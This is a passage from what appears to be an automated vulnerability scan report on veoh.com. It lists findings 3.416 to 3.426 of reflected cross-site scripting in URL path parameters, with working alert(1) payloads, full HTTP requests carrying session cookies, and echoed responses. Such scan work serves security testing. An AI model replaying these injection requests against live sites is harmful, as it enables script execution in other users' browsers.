User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'0d02849a2731b721fe5fd6d7cd18b899',
'v207490874eKBjfZCa1503';3c33fe8edd6'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.416. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8 was submitted in the REST URL parameter 4. This input was echoed as fb7a9"><img src=a onerror=alert(1)>a20cb2010f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurefb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=95
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventurefb7a9"><img src=a onerror=alert(1)>a20cb2010f8/sort/most viewed" selected="selected">
...[SNIP]...

3.417. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1 was submitted in the REST URL parameter 4. This input was echoed as 267b0<img src=a onerror=alert(1)>f093e2717f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=47
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure267b0<img src=a onerror=alert(1)>f093e2717f1"}</textarea>
...[SNIP]...

3.418. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9339'%3bd4a836c8b6c was submitted in the REST URL parameter 6. This input was echoed as a9339';d4a836c8b6c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekAa9339'%3bd4a836c8b6c HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:16 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=14
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'1866d7d6148455dd31ade42934b7bfb0',
'v20749145FCR2QekAa9339';d4a836c8b6c'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.419. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9 was submitted in the REST URL parameter 4. This input was echoed as 8887d"><img src=a onerror=alert(1)>d7d3c7b55c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:26 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=4
Content-Length: 76350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure8887d"><img src=a onerror=alert(1)>d7d3c7b55c9/sort/most viewed" selected="selected">
...[SNIP]...

3.420. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576 was submitted in the REST URL parameter 4. This input was echoed as e2bc5<img src=a onerror=alert(1)>20ab6849576 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuree2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=88
Content-Length: 76304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree2bc5<img src=a onerror=alert(1)>20ab6849576"}</textarea>
...[SNIP]...

3.421. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 217c0'%3b0ff76e45310 was submitted in the REST URL parameter 6. This input was echoed as 217c0';0ff76e45310 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N217c0'%3b0ff76e45310 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'b0e4a2b3cb22b22c0ca21fc59fcdbf7d',
'v20753891TQ237Z7N217c0';0ff76e45310'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.422. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f was submitted in the REST URL parameter 4. This input was echoed as d72a7"><img src=a onerror=alert(1)>bce4688ba7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventured72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 76749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventured72a7"><img src=a onerror=alert(1)>bce4688ba7f/sort/most viewed" selected="selected">
...[SNIP]...

3.423. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1 was submitted in the REST URL parameter 4. This input was echoed as e341d<img src=a onerror=alert(1)>553e22281c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuree341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 76705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree341d<img src=a onerror=alert(1)>553e22281c1"}</textarea>
...[SNIP]...

3.424. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 134b4'%3b0705df69313 was submitted in the REST URL parameter 6. This input was echoed as 134b4';0705df69313 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8134b4'%3b0705df69313 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=51
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'182e6e9265c0c89adc0076cdbb27f7c6',
'v2075425966g5b8E8134b4';0705df69313'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.425. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf was submitted in the REST URL parameter 4. This input was echoed as 9241d<img src=a onerror=alert(1)>74c4f0281bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 76199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure9241d<img src=a onerror=alert(1)>74c4f0281bf"}</textarea>
...[SNIP]...

3.426. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de was submitted in the REST URL parameter 4. This input was echoed as 6cf07"><img src=a onerror=alert(1)>5bb73bd76de in the application's response.

